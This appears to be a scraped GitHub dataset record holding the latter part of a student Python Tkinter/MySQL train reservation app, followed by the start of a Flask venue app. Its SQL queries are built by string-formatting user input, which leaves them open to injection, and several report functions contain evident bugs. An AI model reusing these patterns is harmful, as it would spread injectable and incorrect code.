floor(self.w.get()/9)\n updateTuple = self.results[updateIndex]\n\n l1 = Label(frame, text = \"Current Train Ticket\")\n l1.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree = self.updateTree2(frame2)\n tree.insert('', i, text='', values=(updateTuple[1], updateTuple[3],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n newdepDate= Label(frame3,text =\"New Departure Date\")\n newdepDate.grid(row = 0, column = 0, sticky = E)\n self.date = StringVar() ## assume YYYY-MM-DD\n e1= Entry(frame3,textvariable = self.date, width = 10)\n e1.grid(row = 0, column = 1, sticky = EW)\n self.updatedDate = updateTuple[3]\n b1 = Button(frame3, text = \"Search availability\", command = self.updateDepartureDate)\n b1.grid(row = 0, column = 2, sticky = EW)\n\n\n l2 = Label(frame3, text = \"Updated Train Ticket\")\n l2.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree2 = self.updateTree3(frame4)\n tree2.insert('', i, text='', values=(updateTuple[1],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n\n\n\n server = self.Connect()\n cursor = server.cursor()\n query2 = \"SELECT Change_fee FROM SYSTEM_INFO\"\n cursor.execute(query2)\n changefee = cursor.fetchone()\n change_fee = changefee[0]\n query4 = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query4)\n self.results = cursor.fetchall()\n query3 = \"SELECT Total_Cost FROM RESERVES WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.resID.get(), self.results[self.index][1])\n cursor.execute(query3)\n totalcost = cursor.fetchone()\n self.total_cost = totalcost[0]\n self.total_cost = self.total_cost + change_fee\n print (type(self.total_cost))\n\n changeFee = Label(frame5,text =\"Change Fee\")\n changeFee.grid(row = 0, column = 0, sticky = E)\n self.value = StringVar()\n e2 = Label(frame5,text = change_fee, width = 10)\n e2.grid(row = 0, column = 1, sticky = E)\n updatedCost = Label(frame5,text =\"Updated Total Cost\")\n updatedCost.grid(row = 1, column = 0, sticky = E)\n e3 = Label(frame5, text = self.total_cost, width = 10)\n e3.grid(row = 1, column = 1)\n\n\n b2=Button(frame5, text =\"Back\", command = self.switchUpdateReservation2)\n b2.grid(row =2, column = 0, sticky = E)\n b3=Button(frame5, text =\"Submit\", command = self.submit)\n b3.grid(row =2, column = 1, sticky = E)\n\n\n def submit(self):\n self.updateWin3.destroy()\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"UPDATE RESERVES SET RESERVES.Departure_Date = '%s', RESERVES.Total_Cost = '%d' WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.updatedDate, self.total_cost, self.resID.get(), self.results[self.index][1])\n cursor.execute(query1)\n cursor.close()\n server.commit()\n server.close()\n self.mainMenu()\n\n def cancelRes(self):\n self.primaryWindow.withdraw()\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n self.cancelID = IntVar()\n e1 = Entry(frame, text = self.cancelID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.cancelRes2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchToMain)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchToMain(self):\n self.cancelWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def updateTree4(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 0, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"Date\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"Date\", text= \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def cancelRes2(self):\n self.cancelWin.destroy()\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin2)\n frame.pack()\n frame2 = Frame(self.cancelWin2)\n frame2.pack()\n frame3 = Frame(self.cancelWin2)\n frame3.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.cancelID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n if len(self.results) == 0:\n messagebox.showerror(\"Error\", \"Reservation already cancelled, cannot cancel again\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n\n i = 0\n self.delPrice = 0\n tree = self.updateTree4(frame)\n dates = []\n for res in self.results:\n tree.insert('', i, text='', values=(res[1], res[3], res[6],res[7], res[2], res[8], res[5],res[4]))\n self.delPrice += res[8]\n dates.append(res[3])\n i += 1\n self.departDate = min(dates)\n\n l1= Label(frame2,text =\"Total Cost of Reservation\")\n l1.grid(row = 1, column = 0, sticky = E)\n\n e1= Label(frame2,text = self.delPrice, width = 10)\n e1.grid(row = 1, column = 1, sticky = EW)\n\n #self.cancelDate = datetime.today()\n self.cancelDate = datetime.date.today()\n l2 = Label(frame2, text = \"Date of Cancellation\")\n l2.grid(row = 2, column = 0, sticky = E)\n e2= Label(frame2,text = self.cancelDate, width = 10)\n e2.grid(row = 2, column = 1, sticky = EW)\n\n if self.cancelDate < (self.departDate - datetime.timedelta(7)):\n self.refund = float(self.delPrice) * 0.8 - 50.0\n elif self.cancelDate < (self.departDate - datetime.timedelta(1)) and (self.cancelDate > (self.departDate - datetime.timedelta(7))):\n self.refund = float(self.delPrice) * 0.5 - 50\n elif self.cancelDate > (self.departDate - datetime.timedelta(1)):\n self.refund = 0\n messagebox.showerror(\"Error\", \"Cannot cancel reservation within a day of departure date\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n elif self.refund < 0:\n self.refund = 0\n\n l3 = Label(frame2, text = \"Amount to be Refunded\")\n l3.grid(row = 3, column = 0, sticky = E)\n e2= Label(frame2,text = self.refund, width = 10)\n e2.grid(row = 3, column = 1, sticky = EW)\n\n b2=Button(frame3, text =\"Back\", command = self.switchCancelRes1)\n b2.grid(row =4, column = 0, sticky = E)\n\n b3=Button(frame3, text =\"Submit\", command = self.switchTC)\n b3.grid(row =4, column = 1, sticky = E)\n\n def switchCancelRes1(self):\n self.cancelWin2.destroy()\n self.cancelRes()\n\n def switchTC(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Is_cancelled, MIN(Departure_Date) FROM RESERVATION, RESERVES WHERE RESERVES.ReservationID = '%d' AND RESERVATION.ReservationID = '%d'\" % (self.cancelID.get(), self.cancelID.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n queryCancel = \"UPDATE RESERVATION SET Is_cancelled = 1 WHERE ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(queryCancel)\n query = \"DELETE FROM RESERVES WHERE RESERVES.ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(query)\n\n cursor.close()\n server.commit()\n server.close()\n self.cancelWin2.destroy()\n self.primaryWindow.destroy()\n self.primaryWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewReview(self):\n self.primaryWindow.withdraw()\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.TrainReviewNumber, width = 20)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Back\", command = self.backMain)\n b1.grid(row = 1, column = 0)\n b2 = Button(frame, text = \"Next\", command = self.viewReview2)\n b2.grid(row = 1, column = 1)\n\n def backMain(self):\n self.viewReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"select\",\"train\",\"time\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"select\", text= \"Select\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"time\", text= \"Time (Duration)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def viewReview2(self):\n self.viewReviewWin.withdraw()\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin2)\n frame.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Comment, Rating FROM REVIEW WHERE REVIEW.Train_Number = '%d'\" % (TrainReviewNumber)\n cursor.execute(query)\n results = cursor.fetchall()\n\n tree = self.viewTree(frame)\n\n b1 = Button(frame, text = \"Back to Choose Functionality\", command = self.switchMainMenu)\n b1.pack(side = BOTTOM)\n\n def switchMainMenu(self):\n self.viewReviewWin2.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def giveReview(self):\n self.primaryWindow.destroy()\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n\n frame = Frame(self.giveReviewWin)\n frame.pack()\n\n self.trainNo = IntVar()\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.trainNo, width = 20)\n e1.grid(row = 0, column = 1)\n\n l2 = Label(frame, text = \"Rating\")\n l2.grid(row = 1, column = 0, sticky = W)\n self.rating = StringVar()\n self.cho = [\"Very Good\", \"Good\", \"Neutral\", \"Bad\", \"Very Bad\"]\n\n option = OptionMenu(frame, self.rating, self.cho[0], *self.cho)\n option.grid(row = 1, column = 1)\n\n self.comment = StringVar()\n l3 = Label(frame, text = \"Comment\")\n l3.grid(row = 2, column = 0, sticky = W)\n e3 = Entry(frame, textvariable = self.comment, width = 20)\n e3.grid(row = 2, column = 1)\n\n b1=Button(frame, text =\"Submit\", command = self.verifyRev)\n b1.grid(row = 3, column = 1)\n\n\n def verifyRev(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n if self.trainNo == \"\" or self.rating == \"\":\n messagebox.showerror(\"Error\", \"Train Number and Rating cannot be left blank.\")\n else:\n self.rate = 5\n if self.rating.get() == self.cho[0]:\n self.rate = 5\n elif self.rating.get() == self.cho[1]:\n self.rate = 4\n elif self.rating.get() == self.cho[2]:\n self.rate = 3\n elif self.rating.get() == self.cho[3]:\n self.rate = 2\n elif self.rating.get() == self.cho[4]:\n self.rate = 1\n\n server = self.Connect()\n cursor = server.cursor()\n queryFrom = \"SELECT MAX(Review_Number) FROM REVIEW\"\n cursor.execute(queryFrom)\n result = cursor.fetchall()\n\n query = \"INSERT INTO REVIEW(Review_Number, Comment, Rating, Username, Train_Number) VALUES ('%d', '%s', '%d', '%s', '%d')\" % (result[0][0] + 1, self.comment.get(), self.rate, self.username.get(), self.trainNo.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ################ check to see if the train number is valid###############################\n def mainBack(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n ######elif ##train number isnt correct:\n else:\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ###########write the rating to a DB#################\n\n\n def viewTree2(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"rev\")\n tree.heading(\"mon\", text= \"Month\")\n tree.heading(\"rev\", text= \"Revenue\")\n return tree\n\n def viewRevenueRep(self):\n self.primaryWindow.withdraw()\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n\n frame = Frame(self.viewRevenueReport)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n\n if backOne == \"01\":\n backOneShow = \"January\"\n if backOne == \"02\":\n backOneShow = \"February\"\n if backOne == \"03\":\n backOneShow = \"March\"\n if backOne == \"04\":\n backOneShow = \"April\"\n if backOne == \"05\":\n backOneShow = \"May\"\n if backOne == \"06\":\n backOneShow = \"June\"\n if backOne == \"07\":\n backOneShow = \"July\"\n if backOne == \"08\":\n backOneShow = \"August\"\n if backOne == \"09\":\n backOneShow = \"September\"\n if backOne == \"10\":\n backOneShow = \"October\"\n if backOne == \"11\":\n backOneShow = \"November\"\n if backOne == \"12\":\n backOneShow = \"December\"\n\n\n if backTwo == \"01\":\n backTwoShow = \"January\"\n if backTwo == \"02\":\n backTwoShow = \"February\"\n if backTwo == \"03\":\n backTwoShow = \"March\"\n if backTwo == \"04\":\n backTwoShow = \"April\"\n if backTwo == \"05\":\n backTwoShow = \"May\"\n if backTwo == \"06\":\n backTwoShow = \"June\"\n if backTwo == \"07\":\n backTwoShow = \"July\"\n if backTwo == \"08\":\n backTwoShow = \"August\"\n if backTwo == \"09\":\n backTwoShow = \"September\"\n if backTwo == \"10\":\n backTwoShow = \"October\"\n if backTwo == \"11\":\n backTwoShow = \"November\"\n if backTwo == \"12\":\n backTwoShow = \"December\"\n\n if backThree == \"01\":\n backThreeShow = \"January\"\n if backThree == \"02\":\n backThreeShow = \"February\"\n if backThree == \"03\":\n backThreeShow = \"March\"\n if backThree == \"04\":\n backThreeShow = \"April\"\n if backThree == \"05\":\n backThreeShow = \"May\"\n if backThree == \"06\":\n backThreeShow = \"June\"\n if backThree == \"07\":\n backThreeShow = \"July\"\n if backThree == \"08\":\n backThreeShow = \"August\"\n if backThree == \"09\":\n backThreeShow = \"September\"\n if backThree == \"10\":\n backThreeShow = \"October\"\n if backThree == \"11\":\n backThreeShow = \"November\"\n if backThree == \"12\":\n backThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backThree, backTwo)\n query2 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backTwo, backOne)\n query3 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backOne, current)\n cursor.execute(query1)\n result1 = cursor.fetchall()\n cursor.execute(query2)\n result2 = cursor.fetchall()\n cursor.execute(query3)\n result3 = cursor.fetchall()\n\n tree = self.viewTree2(frame)\n tree.insert('', 0, text='', values=(backThreeShow, result1[0][0]))\n tree.insert('', 1, text='', values=(backTwoShow, result2[0][0]))\n tree.insert('', 2, text='', values=(backOneShow, result3[0][0]))\n\n b1 = Button(frame, text = \"Back\", command = self.switchMain)\n b1.pack(side = BOTTOM)\n\n def switchMain(self):\n self.viewRevenueReport.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewTree3(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"num\",\"rsv\")\n tree.heading(\"mon\", text= \"Month\")\n tree.heading(\"num\", text= \"Train number\")\n tree.heading(\"rsv\", text= \"#of Reservations\")\n return tree\n\n def viewpopRR(self):\n #to store in tree somehow\n\n #Month - Route - Reservations\n #backThreeShow results1[0][0] results1[0][1]\n # results1[1][0] results1[1][1]\n # results1[2][0] results1[2][1]\n #backTwoShow results2[0][0] results2[0][1]\n # results2[1][0] results2[1][1]\n # results2[2][0] results2[2][1]\n #backOneShow results3[0][0] results3[0][1]\n # results3[1][0] results3[1][1]\n # results3[2][0] results3[2][1]\n\n self.primaryWindow.withdraw()\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n frame = Frame(self.viewpopRRWin)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n backOneM = backOne[5:7]\n backTwoM = backTwo[5:7]\n backThreeM = backThree[5:7]\n backOneShow = \"\"\n backTwoShow = \"\"\n backThreeShow = \"\"\n\n if backOneM == \"01\":\n backOneShow = \"January\"\n if backOneM == \"02\":\n backOneShow = \"February\"\n if backOneM == \"03\":\n backOneShow = \"March\"\n if backOneM == \"04\":\n backOneShow = \"April\"\n if backOneM == \"05\":\n backOneShow = \"May\"\n if backOneM == \"06\":\n backOneShow = \"June\"\n if backOneM == \"07\":\n backOneShow = \"July\"\n if backOneM == \"08\":\n backOneShow = \"August\"\n if backOneM == \"09\":\n backOneShow = \"September\"\n if backOneM == \"10\":\n backOneShow = \"October\"\n if backOneM == \"11\":\n backOneShow = \"November\"\n if backOneM == \"12\":\n backOneShow = \"December\"\n\n\n if backTwoM == \"01\":\n backTwoShow = \"January\"\n if backTwoM == \"02\":\n backTwoShow = \"February\"\n if backTwoM == \"03\":\n backTwoShow = \"March\"\n if backTwoM == \"04\":\n backTwoShow = \"April\"\n if backTwoM == \"05\":\n backTwoShow = \"May\"\n if backTwoM == \"06\":\n backTwoShow = \"June\"\n if backTwoM == \"07\":\n backTwoShow = \"July\"\n if backTwoM == \"08\":\n backTwoShow = \"August\"\n if backTwoM == \"09\":\n backTwoShow = \"September\"\n if backTwoM == \"10\":\n backTwoShow = \"October\"\n if backTwoM == \"11\":\n backTwoShow = \"November\"\n if backTwoM == \"12\":\n backTwoShow = \"December\"\n\n if backThreeM == \"01\":\n backThreeShow = \"January\"\n if backThreeM == \"02\":\n backThreeShow = \"February\"\n if backThreeM == \"03\":\n backThreeShow = \"March\"\n if backThreeM == \"04\":\n backThreeShow = \"April\"\n if backThreeM == \"05\":\n backThreeShow = \"May\"\n if backThreeM == \"06\":\n backThreeShow = \"June\"\n if backThreeM == \"07\":\n backThreeShow = \"July\"\n if backThreeM == \"08\":\n backThreeShow = \"August\"\n if backThreeM == \"09\":\n backThreeShow = \"September\"\n if backThreeM == \"10\":\n backThreeShow = \"October\"\n if backThreeM == \"11\":\n backThreeShow = \"November\"\n if backThreeM == \"12\":\n bakcThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n queryMonth1 = \"CREATE VIEW Month1 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backThree, backTwo)\n cursor.execute(queryMonth1)\n queryHere1 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month1 GROUP BY TNumber\"\n cursor.execute(queryHere1)\n tempResults1 = cursor.fetchall()\n queryPerTrain1 = \"CREATE TABLE PerTrain1(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain1)\n for result in tempResults1:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain1 = \"INSERT INTO PerTrain1(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain1)\n server.commit()\n queryUltimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryUltimate1)\n preResults11 = cursor.fetchall()\n maxNum11 = 0\n maxTup11 = (0,0)\n for result in preResults11:\n if result[1] > maxNum11:\n maxNum11 = result[1]\n maxTup11 = (result[0], result[1])\n results1 = []\n results1.append(maxTup11)\n if len(results1) < 3:\n queryNext = \"DELETE FROM PerTrain1 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryPenultimate1)\n preResults12 = cursor.fetchall()\n maxNum12 = 0\n maxTup12 = (0,0)\n for result in preResults12:\n if result[1] > maxNum12:\n maxNum12 = result[1]\n maxTup12 = (result[0], result[1])\n results1.append(maxTup12)\n if len(results1) < 3:\n queryNext = \"DELETE FROM PerTrain1 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate1 = \"SELECT * FROM PerTrain1\"\n cursor.execute(queryAntepenultimate1)\n preResults13 = cursor.fetchall()\n maxNum13 = 0\n maxTup13 = (0,0)\n for result in preResults13:\n if result[1] > maxNum13:\n maxNum13 = result[1]\n maxTup13 = (result[0], result[1])\n results1.append(maxTup13)\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n\n queryMonth2 = \"CREATE VIEW Month2 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backTwo, backOne)\n cursor.execute(queryMonth2)\n queryHere2 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month2 GROUP BY TNumber\"\n cursor.execute(queryHere2)\n tempResults2 = cursor.fetchall()\n queryPerTrain2 = \"CREATE TABLE PerTrain2(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain2)\n for result in tempResults2:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain2 = \"INSERT INTO PerTrain2(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain2)\n server.commit()\n queryUltimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryUltimate2)\n preResults21 = cursor.fetchall()\n maxNum21 = 0\n maxTup21 = (0,0)\n for result in preResults21:\n if result[1] > maxNum21:\n maxNum21 = result[1]\n maxTup21 = (result[0], result[1])\n results2 = []\n results2.append(maxTup21)\n if len(results2) < 3:\n queryNext = \"DELETE FROM PerTrain2 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryPenultimate2)\n preResults22 = cursor.fetchall()\n maxNum22 = 0\n maxTup22 = (0,0)\n for result in preResults22:\n if result[1] > maxNum22:\n maxNum22 = result[1]\n maxTup22 = (result[0], result[1])\n results2.append(maxTup22)\n if len(results2) < 3:\n queryNext = \"DELETE FROM PerTrain2 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate2 = \"SELECT * FROM PerTrain2\"\n cursor.execute(queryAntepenultimate2)\n preResults23 = cursor.fetchall()\n maxNum23 = 0\n maxTup23 = (0,0)\n for result in preResults23:\n if result[1] > maxNum13:\n maxNum23 = result[1]\n maxTup23 = (result[0], result[1])\n results2.append(maxTup23)\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n else:\n pass\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n else:\n pass\n #insert table stuff here; results2[0][0] = route num, results2[0][1] = max # of reservations, etc, up to results2[2][1]\n\n queryMonth3 = \"CREATE VIEW Month3 (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '%d' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (0, backOne, current)\n cursor.execute(queryMonth3)\n queryHere3 = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month3 GROUP BY TNumber\"\n cursor.execute(queryHere3)\n tempResults3 = cursor.fetchall()\n queryPerTrain3 = \"CREATE TABLE PerTrain3(Route INT(10), Num INT(10))\"\n cursor.execute(queryPerTrain3)\n for result in tempResults3:\n self.TNumber = result[0]\n self.countReservations = result[1]\n queryFillTrain3 = \"INSERT INTO PerTrain3(Route, Num) VALUES ('%d', '%d')\" % (self.TNumber, self.countReservations)\n cursor.execute(queryFillTrain3)\n server.commit()\n queryUltimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryUltimate3)\n preResults31 = cursor.fetchall()\n maxNum31 = 0\n maxTup31 = (0,0)\n for result in preResults31:\n if result[1] > maxNum31:\n maxNum31 = result[1]\n maxTup31 = (result[0], result[1])\n results3 = []\n results3.append(maxTup31)\n if len(results3) < 3:\n queryNext = \"DELETE FROM PerTrain3 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryPenultimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryPenultimate3)\n preResults32 = cursor.fetchall()\n maxNum32 = 0\n maxTup32 = (0,0)\n for result in preResults32:\n if result[1] > maxNum32:\n maxNum32 = result[1]\n maxTup32 = (result[0], result[1])\n results3.append(maxTup32)\n if len(results3) < 3:\n queryNext = \"DELETE FROM PerTrain3 ORDER BY Num DESC LIMIT 1\"\n cursor.execute(queryNext)\n queryAntepenultimate3 = \"SELECT * FROM PerTrain3\"\n cursor.execute(queryAntepenultimate3)\n preResults33 = cursor.fetchall()\n maxNum33 = 0\n maxTup33 = (0,0)\n for result in preResults33:\n if result[1] > maxNum13:\n maxNum33 = result[1]\n maxTup33 = (result[0], result[1])\n results3.append(maxTup33)\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n else:\n pass\n #insert table stuff here; results1[0][0] = route num, results[0][1] = max # of reservations, etc, up to results1[2][1]\n\n queryDrop11 = \"DROP VIEW Month1\"\n queryDrop12 = \"DROP TABLE PerTrain1\"\n queryDrop21 = \"DROP VIEW Month2\"\n queryDrop22 = \"DROP TABLE PerTrain2\"\n queryDrop31 = \"DROP VIEW Month3\"\n queryDrop32 = \"DROP TABLE PerTrain3\"\n cursor.execute(queryDrop11)\n cursor.execute(queryDrop12)\n cursor.execute(queryDrop21)\n cursor.execute(queryDrop22)\n cursor.execute(queryDrop31)\n cursor.execute(queryDrop32)\n server.commit()\n cursor.close()\n server.close()\n\n tree = self.viewTree3(frame)\n tree.insert('', 0, text='', values=(backThreeShow, results1[0][0], results1[0][1]))\n tree.insert('', 1, text='', values=(backThreeShow, results1[1][0], results1[1][1]))\n tree.insert('', 2, text='', values=(backThreeShow, results1[2][0], results1[2][1]))\n tree.insert('', 3, text='', values=(backTwoShow, results2[0][0], results2[0][1]))\n tree.insert('', 4, text='', values=(backTwoShow, results2[1][0], results2[1][1]))\n tree.insert('', 5, text='', values=(backTwoShow, results2[2][0], results2[2][1]))\n tree.insert('', 6, text='', values=(backOneShow, results3[0][0], results3[0][1]))\n tree.insert('', 7, text='', values=(backOneShow, results3[1][0], results3[1][1]))\n tree.insert('', 8, text='', values=(backOneShow, results3[2][0], results3[2][1]))\n\n\n def swtMain(self):\n self.viewpopRRWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\nmw = Tk()\napp = Phase_three(mw)\nmw.mainloop()\n","repo_name":"achiang31/Train_4400","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":73124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39782305374","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\nfrom datetime import datetime\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n# TODO: connect to a local postgresql database\n# --> Done. Please check details in config.py\n\nfrom flask_migrate import Migrate\nmigrate = Migrate(app, db)\n\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\nclass Venue(db.Model):\n __tablename__ = 'venues'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n address = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: genres, website_link, seeking_talent, seeking_description, and relations: shows\n genres = db.Column(db.String(120))\n website_link = db.Column(db.String(120))\n seeking_talent = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='venue', lazy=True)\n \n def __repr__(self):\n return \"\" %(self.id, self.name)\n\nclass Artist(db.Model):\n __tablename__ = 'artists'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = 